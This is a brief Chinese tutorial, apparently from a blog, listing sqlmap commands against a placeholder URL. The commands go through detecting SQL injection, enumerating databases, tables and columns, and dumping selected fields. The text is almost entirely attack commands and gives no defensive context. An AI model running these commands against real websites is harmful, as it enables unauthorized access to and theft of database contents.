1.检查注入点
【注入点需要自己寻找,可以利用一些工具,例如:Acunetix Web Vulnerability
scanner (WVS),IBM等】u表示URL。
sqlmap - u http://www.XXXXX.com/a.asp?p=18
2.列出数据库信息
【sqlmap会帮助我们列出所有的名称,包括数据库类型】
Sqlmap -u www.XXXXX.com/a.asp?p=18 --dbs
3.指定数据库名列出所有表
sqlmap -u www.XXXXX.com/a.asp?p=18 -D 数据库名 --tables
结果:
4.列举指定数据库指定表的所有字段
sqlmap -u www.XXXXX.com/a.asp?p=18 -D 数据名 -T 表名称 --columns
5.输出指定字段的内容
sqlmap -u www.XXXXX.com/a.asp?p=18 -D 数据名 -T 表名称 -C 字段1,字段2 --dump(根据自己的需要,将一些字段输出)
结果:
浙公网安备 33010602011771号